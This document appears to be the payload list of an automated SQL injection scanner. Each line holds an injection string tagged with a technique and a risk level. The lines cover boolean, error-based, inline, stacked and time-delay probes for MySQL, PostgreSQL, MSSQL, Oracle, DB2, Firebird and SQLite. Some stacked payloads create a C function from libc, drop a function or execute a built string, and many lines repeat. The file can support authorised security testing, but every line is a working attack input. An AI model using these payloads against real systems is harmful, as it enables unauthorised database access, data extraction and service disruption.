AND 1=1||SQLi-Boolean||Low
OR 1=1||SQLi-Boolean||High
OR NOT 1=1||SQLi-Boolean||High
AND 1=(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))||SQLi-Boolean||Low
OR 1=(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))||SQLi-Boolean||High
AND 1=1||SQLi-Boolean||Low
OR 1=1||SQLi-Boolean||High
OR NOT 1=1||SQLi-Boolean||High
AND 1=1||SQLi-Boolean||Low
OR 1=1||SQLi-Boolean||High
OR NOT 1=1||SQLi-Boolean||High
AND 1=1||SQLi-Boolean||Low
OR 1=1||SQLi-Boolean||High
RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END))||SQLi-Boolean||Low
AND MAKE_SET(1=1,1)||SQLi-Boolean||Low
OR MAKE_SET(1=1,1)||SQLi-Boolean||High
AND ELT(1=1,1)||SQLi-Boolean||Low
OR ELT(1=1,1)||SQLi-Boolean||High
AND EXTRACTVALUE(1,CASE WHEN (1=1) THEN 1 ELSE 0x3A END)||SQLi-Boolean||Low
OR EXTRACTVALUE(1,CASE WHEN (1=1) THEN 1 ELSE 0x3A END)||SQLi-Boolean||High
AND (SELECT (CASE WHEN (1=1) THEN NULL ELSE CAST('vun' AS NUMERIC) END)) IS NULL||SQLi-Boolean||Low
OR (SELECT (CASE WHEN (1=1) THEN NULL ELSE CAST('vun' AS NUMERIC) END)) IS NULL||SQLi-Boolean||High
AND (SELECT (CASE WHEN (1=1) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,1) END) FROM DUAL) IS NULL||SQLi-Boolean||Low
OR (SELECT (CASE WHEN (1=1) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,1) END) FROM DUAL) IS NULL||SQLi-Boolean||High
AND CASE WHEN 1=1 THEN 1 ELSE JSON('vun') END||SQLi-Boolean||Low
OR CASE WHEN 1=1 THEN 1 ELSE JSON('vun') END||SQLi-Boolean||High
(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))||SQLi-Boolean||Low
MAKE_SET(1=1,1)||SQLi-Boolean||Low
MAKE_SET(1=1,1)||SQLi-Boolean||Low
ELT(1=1,1)||SQLi-Boolean||Low
ELT(1=1,1)||SQLi-Boolean||Low
(1=1)*1||SQLi-Boolean||Low
(1=1)*1||SQLi-Boolean||Low
(SELECT (CASE WHEN (1=1) THEN 1 ELSE 1/(SELECT 0) END))||SQLi-Boolean||Low
(SELECT (CASE WHEN (1=1) THEN 1 ELSE 1/(SELECT 0) END))||SQLi-Boolean||Low
(SELECT * FROM GENERATE_SERIES(1,1,CASE WHEN (1=1) THEN 1 ELSE 0 END) LIMIT 1)||SQLi-Boolean||Low
(SELECT 1 FROM GENERATE_SERIES(1,1,CASE WHEN (1=1) THEN 1 ELSE 0 END) LIMIT 1)||SQLi-Boolean||Low
(SELECT (CASE WHEN (1=1) THEN 1 ELSE 1*(SELECT 1 UNION ALL SELECT 1) END))||SQLi-Boolean||Low
(SELECT (CASE WHEN (1=1) THEN 1 ELSE 1*(SELECT 1 UNION ALL SELECT 1) END))||SQLi-Boolean||Low
(SELECT (CASE WHEN (1=1) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)||SQLi-Boolean||Low
(SELECT (CASE WHEN (1=1) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)||SQLi-Boolean||Low
(SELECT (CASE WHEN (1=1) THEN 1 ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)||SQLi-Boolean||Low
(SELECT (CASE WHEN (1=1) THEN 1 ELSE 1 END) FROM SYSMASTER:SYSDUAL)||SQLi-Boolean||Low
IIF(1=1,1,1/0)||SQLi-Boolean||Low
IIF(1=1,1,1/0)||SQLi-Boolean||Low
(CASE WHEN (1=1) THEN 1 ELSE 1*(SELECT 1 FROM DUAL UNION SELECT 1 FROM DUAL) END)||SQLi-Boolean||Low
(CASE WHEN (1=1) THEN 1 ELSE 1*(SELECT 1 FROM DUAL UNION SELECT 1 FROM DUAL) END)||SQLi-Boolean||Low
(CASE WHEN 1=1 THEN 1 ELSE NULL END)||SQLi-Boolean||Low
(CASE WHEN 1=1 THEN 1 ELSE NULL END)||SQLi-Boolean||Low
,(SELECT (CASE WHEN (1=1) THEN 1 ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.PLUGINS) END))||SQLi-Boolean||Low
,(SELECT (CASE WHEN (1=1) THEN 1 ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.PLUGINS) END))||SQLi-Boolean||Low
,(SELECT (CASE WHEN (1=1) THEN 1 ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.PLUGINS) END))||SQLi-Boolean||Low
,(SELECT (CASE WHEN (1=1) THEN 1 ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.PLUGINS) END))||SQLi-Boolean||Low
,(SELECT (CASE WHEN (1=1) THEN 1 ELSE 1/(SELECT 0) END))||SQLi-Boolean||Low
,(SELECT (CASE WHEN (1=1) THEN 1 ELSE 1/(SELECT 0) END))||SQLi-Boolean||Low
,(SELECT * FROM GENERATE_SERIES(1,1,CASE WHEN (1=1) THEN 1 ELSE 0 END) LIMIT 1)||SQLi-Boolean||Low
,(SELECT (CASE WHEN (1=1) THEN 1 ELSE 1*(SELECT 1 UNION ALL SELECT 1) END))||SQLi-Boolean||Low
,(SELECT (CASE WHEN (1=1) THEN 1 ELSE 1*(SELECT 1 UNION ALL SELECT 1) END))||SQLi-Boolean||Low
,(SELECT (CASE WHEN (1=1) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)||SQLi-Boolean||Low
,(SELECT (CASE WHEN (1=1) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)||SQLi-Boolean||Low
,IIF(1=1,1,1/0)||SQLi-Boolean||Low
,IIF(1=1,1,1/0)||SQLi-Boolean||Low
,(CASE WHEN 1=1 THEN 1 ELSE NULL END)||SQLi-Boolean||Low
,(CASE WHEN 1=1 THEN 1 ELSE NULL END)||SQLi-Boolean||Low
,(SELECT CASE WHEN 1=1 THEN 1 ELSE RAISE_ERROR(70001, 'vun') END FROM SYSIBM.SYSDUMMY1)||SQLi-Boolean||Low
,(SELECT CASE WHEN 1=1 THEN 1 ELSE RAISE_ERROR(70001, 'vun') END FROM SYSIBM.SYSDUMMY1)||SQLi-Boolean||Low
HAVING 1=1||SQLi-Boolean||Low
;SELECT (CASE WHEN (1=1) THEN 1 ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.PLUGINS) END)||SQLi-Boolean||Low
;SELECT (CASE WHEN (1=1) THEN 1 ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.PLUGINS) END)||SQLi-Boolean||Low
;SELECT (CASE WHEN (1=1) THEN 1 ELSE 1/(SELECT 0) END)||SQLi-Boolean||Low
;SELECT * FROM GENERATE_SERIES(1,1,CASE WHEN (1=1) THEN 1 ELSE 0 END) LIMIT 1||SQLi-Boolean||Low
;IF(1=1) SELECT 1 ELSE DROP FUNCTION vun||SQLi-Boolean||Low
;SELECT (CASE WHEN (1=1) THEN 1 ELSE 1*(SELECT 1 UNION ALL SELECT 1) END)||SQLi-Boolean||Low
;SELECT (CASE WHEN (1=1) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL||SQLi-Boolean||Low
;IIF(1=1,1,1/0)||SQLi-Boolean||Low
;SELECT CASE WHEN 1=1 THEN 1 ELSE NULL END FROM DUAL||SQLi-Boolean||Low
AND EXTRACTVALUE(1,CONCAT('\','',(SELECT (ELT(1=1,1))),''))||SQLi-Error||Low
OR EXTRACTVALUE(1,CONCAT('\','',(SELECT (ELT(1=1,1))),''))||SQLi-Error||High
AND GTID_SUBSET(CONCAT('',(SELECT (ELT(1=1,1))),''),1)||SQLi-Error||Low
OR GTID_SUBSET(CONCAT('',(SELECT (ELT(1=1,1))),''),1)||SQLi-Error||High
AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('',(SELECT (ELT(1=1,1))),'','x'))s), 8446744073709551610, 8446744073709551610)))||SQLi-Error||Low
OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('',(SELECT (ELT(1=1,1))),'','x'))s), 8446744073709551610, 8446744073709551610)))||SQLi-Error||High
AND EXP(~(SELECT * FROM (SELECT CONCAT('',(SELECT (ELT(1=1,1))),'','x'))x))||SQLi-Error||Low
OR EXP(~(SELECT * FROM (SELECT CONCAT('',(SELECT (ELT(1=1,1))),'','x'))x))||SQLi-Error||High
AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('',(SELECT (ELT(1=1,1))),'')) USING utf8)))||SQLi-Error||Low
OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('',(SELECT (ELT(1=1,1))),'')) USING utf8)))||SQLi-Error||High
AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT('',(SELECT (ELT(1=1,1))),'',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)||SQLi-Error||Low
OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT('',(SELECT (ELT(1=1,1))),'',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)||SQLi-Error||High
(SELECT 1 FROM(SELECT COUNT(*),CONCAT('',(SELECT (ELT(1=1,1))),'',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)||SQLi-Error||Low
AND UPDATEXML(1,CONCAT('.','',(SELECT (ELT(1=1,1))),''),1)||SQLi-Error||Low
OR UPDATEXML(1,CONCAT('.','',(SELECT (ELT(1=1,1))),''),1)||SQLi-Error||High
AND ROW(1,1)>(SELECT COUNT(*),CONCAT('',(SELECT (ELT(1=1,1))),'',FLOOR(RAND(0)*2))x FROM (SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5)a GROUP BY x)||SQLi-Error||Low
OR ROW(1,1)>(SELECT COUNT(*),CONCAT('',(SELECT (ELT(1=1,1))),'',FLOOR(RAND(0)*2))x FROM (SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5)a GROUP BY x)||SQLi-Error||High
OR 1 GROUP BY CONCAT('',(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END)),'',FLOOR(RAND(0)*2)) HAVING MIN(0)||SQLi-Error||High
AND 1=CAST(''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'' AS NUMERIC)||SQLi-Error||Low
OR 1=CAST(''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'' AS NUMERIC)||SQLi-Error||High
AND 1 IN (SELECT (''+(SELECT (CASE WHEN (1=1) THEN '1' ELSE '0' END))+''))||SQLi-Error||Low
OR 1 IN (SELECT (''+(SELECT (CASE WHEN (1=1) THEN '1' ELSE '0' END))+''))||SQLi-Error||High
AND 1=CONVERT(INT,(SELECT ''+(SELECT (CASE WHEN (1=1) THEN '1' ELSE '0' END))+''))||SQLi-Error||Low
OR 1=CONVERT(INT,(SELECT ''+(SELECT (CASE WHEN (1=1) THEN '1' ELSE '0' END))+''))||SQLi-Error||High
AND 1=CONCAT('',(SELECT (CASE WHEN (1=1) THEN '1' ELSE '0' END)),'')||SQLi-Error||Low
OR 1=CONCAT('',(SELECT (CASE WHEN (1=1) THEN '1' ELSE '0' END)),'')||SQLi-Error||High
AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END) FROM DUAL)||''||CHR(62))) FROM DUAL)||SQLi-Error||Low
OR 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END) FROM DUAL)||''||CHR(62))) FROM DUAL)||SQLi-Error||High
AND 1=UTL_INADDR.GET_HOST_ADDRESS(''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END) FROM DUAL)||'')||SQLi-Error||Low
OR 1=UTL_INADDR.GET_HOST_ADDRESS(''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END) FROM DUAL)||'')||SQLi-Error||High
AND 1=CTXSYS.DRITHSX.SN(1,(''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END) FROM DUAL)||''))||SQLi-Error||Low
OR 1=CTXSYS.DRITHSX.SN(1,(''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END) FROM DUAL)||''))||SQLi-Error||High
AND 1=DBMS_UTILITY.SQLID_TO_SQLHASH((''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END) FROM DUAL)||''))||SQLi-Error||Low
OR 1=DBMS_UTILITY.SQLID_TO_SQLHASH((''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END) FROM DUAL)||''))||SQLi-Error||High
AND 1=(''||(SELECT CASE 1 WHEN 1 THEN 1 ELSE 0 END FROM RDB$DATABASE)||'')||SQLi-Error||Low
OR 1=(''||(SELECT CASE 1 WHEN 1 THEN 1 ELSE 0 END FROM RDB$DATABASE)||'')||SQLi-Error||High
AND 1=(''||(SELECT CASE 1 WHEN 1 THEN CODE(49) ELSE CODE(48) END)||'')||SQLi-Error||Low
OR 1=(''||(SELECT CASE 1 WHEN 1 THEN CODE(49) ELSE CODE(48) END)||'')||SQLi-Error||High
AND 1=CAST(''||(SELECT (CASE WHEN (1=1) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'' AS NUMERIC)||SQLi-Error||Low
OR 1=CAST(''||(SELECT (CASE WHEN (1=1) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'' AS NUMERIC)||SQLi-Error||High
AND 1=RAISE_ERROR('70001',''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'')||SQLi-Error||Low
OR 1=RAISE_ERROR('70001',''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'')||SQLi-Error||High
AND 1=(''||(CASE WHEN (1=1) THEN '1' ELSE '0' END)||'')||SQLi-Error||Low
OR 1=(''||(CASE WHEN (1=1) THEN '1' ELSE '0' END)||'')||SQLi-Error||High
AND ERROR(CONCAT('',(SELECT (CASE WHEN (1=1) THEN '1' ELSE '0' END)),'')) IS NOT NULL||SQLi-Error||Low
OR ERROR(CONCAT('',(SELECT (CASE WHEN (1=1) THEN '1' ELSE '0' END)),'')) IS NOT NULL||SQLi-Error||High
PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT('\','',(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END)),'')),1)||SQLi-Error||Low
(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('',(SELECT (ELT(1=1,1))),'','x'))s), 8446744073709551610, 8446744073709551610)))||SQLi-Error||Low
EXP(~(SELECT * FROM (SELECT CONCAT('',(SELECT (ELT(1=1,1))),'','x'))x))||SQLi-Error||Low
GTID_SUBSET(CONCAT('',(SELECT (ELT(1=1,1))),''),1)||SQLi-Error||Low
JSON_KEYS((SELECT CONVERT((SELECT CONCAT('',(SELECT (ELT(1=1,1))),'')) USING utf8)))||SQLi-Error||Low
(SELECT 1 FROM(SELECT COUNT(*),CONCAT('',(SELECT (ELT(1=1,1))),'',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)||SQLi-Error||Low
(UPDATEXML(1,CONCAT('.','',(SELECT (ELT(1=1,1))),''),1))||SQLi-Error||Low
(EXTRACTVALUE(1,CONCAT('\','',(SELECT (ELT(1=1,1))),'')))||SQLi-Error||Low
(CAST(''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'' AS NUMERIC))||SQLi-Error||Low
(CAST(''||(SELECT 1 FROM GENERATE_SERIES(1,1,CASE WHEN (1=1) THEN 1 ELSE 0 END) LIMIT 1)::text||'' AS NUMERIC))||SQLi-Error||Low
(CONVERT(INT,(SELECT ''+(SELECT (CASE WHEN (1=1) THEN '1' ELSE '0' END))+'')))||SQLi-Error||Low
(SELECT ''+(SELECT (CASE WHEN (1=1) THEN '1' ELSE '0' END))+'')||SQLi-Error||Low
(SELECT UPPER(XMLType(CHR(60)||CHR(58)||''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END) FROM DUAL)||''||CHR(62))) FROM DUAL)||SQLi-Error||Low
(SELECT 1=(''||(SELECT CASE 1 WHEN 1 THEN 1 ELSE 0 END FROM RDB$DATABASE)||''))||SQLi-Error||Low
RAISE_ERROR('70001',''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'')||SQLi-Error||Low
,(SELECT 1 FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('',(SELECT (ELT(1=1,1))),'','x'))s), 8446744073709551610, 8446744073709551610)))x)||SQLi-Error||Low
,(SELECT 1 FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('',(SELECT (ELT(1=1,1))),'','x'))x)))s)||SQLi-Error||Low
,GTID_SUBSET(CONCAT('',(SELECT (ELT(1=1,1))),''),1)||SQLi-Error||Low
,(SELECT 1 FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('',(SELECT (ELT(1=1,1))),'')) USING utf8))))x)||SQLi-Error||Low
,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('',(SELECT (ELT(1=1,1))),'',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)||SQLi-Error||Low
,EXTRACTVALUE(1,CONCAT('\','',(SELECT (ELT(1=1,1))),''))||SQLi-Error||Low
,UPDATEXML(1,CONCAT('.','',(SELECT (ELT(1=1,1))),''),1)||SQLi-Error||Low
,(SELECT 1 FROM (SELECT ROW(1,1)>(SELECT COUNT(*),CONCAT('',(SELECT (ELT(1=1,1))),'',FLOOR(RAND(0)*2))x FROM (SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5)a GROUP BY x))s)||SQLi-Error||Low
,(CAST(''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'' AS NUMERIC))||SQLi-Error||Low
,(CAST(''||(SELECT 1 FROM GENERATE_SERIES(1,1,CASE WHEN (1=1) THEN 1 ELSE 0 END) LIMIT 1)::text||'' AS NUMERIC))||SQLi-Error||Low
,(SELECT 1 WHERE 1=CONVERT(INT,(SELECT ''+(SELECT (CASE WHEN (1=1) THEN '1' ELSE '0' END))+'')))||SQLi-Error||Low
,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END) FROM DUAL)||''||CHR(62))) FROM DUAL)||SQLi-Error||Low
,(SELECT 1=(''||(SELECT CASE 1 WHEN 1 THEN 1 ELSE 0 END FROM RDB$DATABASE)||''))||SQLi-Error||Low
,RAISE_ERROR('70001',''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'')||SQLi-Error||Low
;DECLARE @vun NVARCHAR(4000);SET @vun=(SELECT ''+(SELECT (CASE WHEN (1=1) THEN '1' ELSE '0' END))+'');EXEC @vun||SQLi-Error||Low
(SELECT CONCAT(CONCAT('',(CASE WHEN (1=1) THEN '1' ELSE '0' END)),''))||SQLi-Inline||Low
(SELECT CONCAT('',(ELT(1=1,1)),''))||SQLi-Inline||Low
(SELECT ''||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'')||SQLi-Inline||Low
(SELECT ''+(CASE WHEN (1=1) THEN '1' ELSE '0' END)+'')||SQLi-Inline||Low
(SELECT ''||(CASE WHEN (1=1) THEN TO_NUMBER(1) ELSE TO_NUMBER(0) END)||'' FROM DUAL)||SQLi-Inline||Low
SELECT ''||(CASE WHEN (1=1) THEN 1 ELSE 0 END)||''||SQLi-Inline||Low
SELECT ''||(CASE 1 WHEN 1 THEN 1 ELSE 0 END)||'' FROM RDB$DATABASE||SQLi-Inline||Low
(''||(CASE WHEN (1=1) THEN '1' ELSE '0' END)||'')||SQLi-Inline||Low
;SELECT SLEEP(5)||SQLi-Stacked||Low
;SELECT SLEEP(5)||SQLi-Stacked||Low
;(SELECT * FROM (SELECT(SLEEP(5)))vun)||SQLi-Stacked||Low
;(SELECT * FROM (SELECT(SLEEP(5)))vun)||SQLi-Stacked||Low
;SELECT BENCHMARK(5000000,MD5('vun'))||SQLi-Stacked||Medium
;SELECT BENCHMARK(5000000,MD5('vun'))||SQLi-Stacked||Medium
;SELECT PG_SLEEP(5)||SQLi-Stacked||Low
;SELECT PG_SLEEP(5)||SQLi-Stacked||Low
;SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000)||SQLi-Stacked||Medium
;SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000)||SQLi-Stacked||Medium
;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep(5)||SQLi-Stacked||Low
;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep(5)||SQLi-Stacked||Low
;WAITFOR DELAY '0:0:5'||SQLi-Stacked||Low
;DECLARE @x CHAR(9);SET @x=0x303a303a35;WAITFOR DELAY @x||SQLi-Stacked||Low
;WAITFOR DELAY '0:0:5'||SQLi-Stacked||Low
;DECLARE @x CHAR(9);SET @x=0x303a303a35;WAITFOR DELAY @x||SQLi-Stacked||Low
;SELECT DBMS_PIPE.RECEIVE_MESSAGE('vun',5) FROM DUAL||SQLi-Stacked||Low
;SELECT DBMS_PIPE.RECEIVE_MESSAGE('vun',5) FROM DUAL||SQLi-Stacked||Low
;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5||SQLi-Stacked||Medium
;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5||SQLi-Stacked||Medium
;BEGIN DBMS_LOCK.SLEEP(5); END||SQLi-Stacked||Low
;BEGIN DBMS_LOCK.SLEEP(5); END||SQLi-Stacked||Low
;BEGIN USER_LOCK.SLEEP(5); END||SQLi-Stacked||Low
;BEGIN USER_LOCK.SLEEP(5); END||SQLi-Stacked||Low
;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3||SQLi-Stacked||Medium
;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3||SQLi-Stacked||Medium
;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))||SQLi-Stacked||Medium
;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))||SQLi-Stacked||Medium
;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4||SQLi-Stacked||Medium
;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4||SQLi-Stacked||Medium
;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3||SQLi-Stacked||Medium
;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3||SQLi-Stacked||Medium
;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(1),0),500000000),NULL)||SQLi-Stacked||Medium
;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(1),0),500000000),NULL)||SQLi-Stacked||Medium
;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),500000000),NULL)||SQLi-Stacked||Medium
;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),500000000),NULL)||SQLi-Stacked||Medium
AND (SELECT 1 FROM (SELECT(SLEEP(5)))vun)||SQLi-Time||Low
OR (SELECT 1 FROM (SELECT(SLEEP(5)))vun)||SQLi-Time||High
AND SLEEP(5)||SQLi-Time||Low
OR SLEEP(5)||SQLi-Time||High
AND SLEEP(5)||SQLi-Time||Low
OR SLEEP(5)||SQLi-Time||High
AND (SELECT 1 FROM (SELECT(SLEEP(5)))vun)||SQLi-Time||Low
OR (SELECT 1 FROM (SELECT(SLEEP(5)))vun)||SQLi-Time||High
AND 1=BENCHMARK(5000000,MD5('vun'))||SQLi-Time||Medium
AND 1=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)||SQLi-Time||Medium
OR 1=BENCHMARK(5000000,MD5('vun'))||SQLi-Time||High
OR 1=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)||SQLi-Time||High
AND 1=BENCHMARK(5000000,MD5('vun'))||SQLi-Time||Medium
AND 1=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)||SQLi-Time||Medium
OR 1=BENCHMARK(5000000,MD5('vun'))||SQLi-Time||High
OR 1=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)||SQLi-Time||High
RLIKE SLEEP(5)||SQLi-Time||Low
RLIKE SLEEP(5)||SQLi-Time||Low
RLIKE (SELECT 1 FROM (SELECT(SLEEP(5)))vun)||SQLi-Time||Low
RLIKE (SELECT 1 FROM (SELECT(SLEEP(5)))vun)||SQLi-Time||Low
AND ELT(1=1,SLEEP(5))||SQLi-Time||Low
OR ELT(1=1,SLEEP(5))||SQLi-Time||High
AND ELT(1=1,SLEEP(5))||SQLi-Time||Low
OR ELT(1=1,SLEEP(5))||SQLi-Time||High
AND 1=(SELECT 1 FROM PG_SLEEP(5))||SQLi-Time||Low
OR 1=(SELECT 1 FROM PG_SLEEP(5))||SQLi-Time||High
AND 1=(SELECT 1 FROM PG_SLEEP(5))||SQLi-Time||Low
OR 1=(SELECT 1 FROM PG_SLEEP(5))||SQLi-Time||High
AND 1=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000))||SQLi-Time||Medium
OR 1=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000))||SQLi-Time||High
AND 1=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000))||SQLi-Time||Medium
OR 1=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000))||SQLi-Time||High
WAITFOR DELAY '0:0:5'||SQLi-Time||Low
WAITFOR DELAY '0:0:5'||SQLi-Time||Low
AND 1=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)||SQLi-Time||Medium
OR 1=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)||SQLi-Time||High
AND 1=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)||SQLi-Time||Medium
OR 1=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)||SQLi-Time||High
AND 1=DBMS_PIPE.RECEIVE_MESSAGE('vun',5)||SQLi-Time||Low
OR 1=DBMS_PIPE.RECEIVE_MESSAGE('vun',5)||SQLi-Time||High
AND 1=DBMS_PIPE.RECEIVE_MESSAGE('vun',5)||SQLi-Time||Low
OR 1=DBMS_PIPE.RECEIVE_MESSAGE('vun',5)||SQLi-Time||High
AND 1=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)||SQLi-Time||Medium
OR 1=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)||SQLi-Time||High
AND 1=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)||SQLi-Time||Medium
OR 1=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)||SQLi-Time||High
AND 1=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)||SQLi-Time||Medium
OR 1=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)||SQLi-Time||High
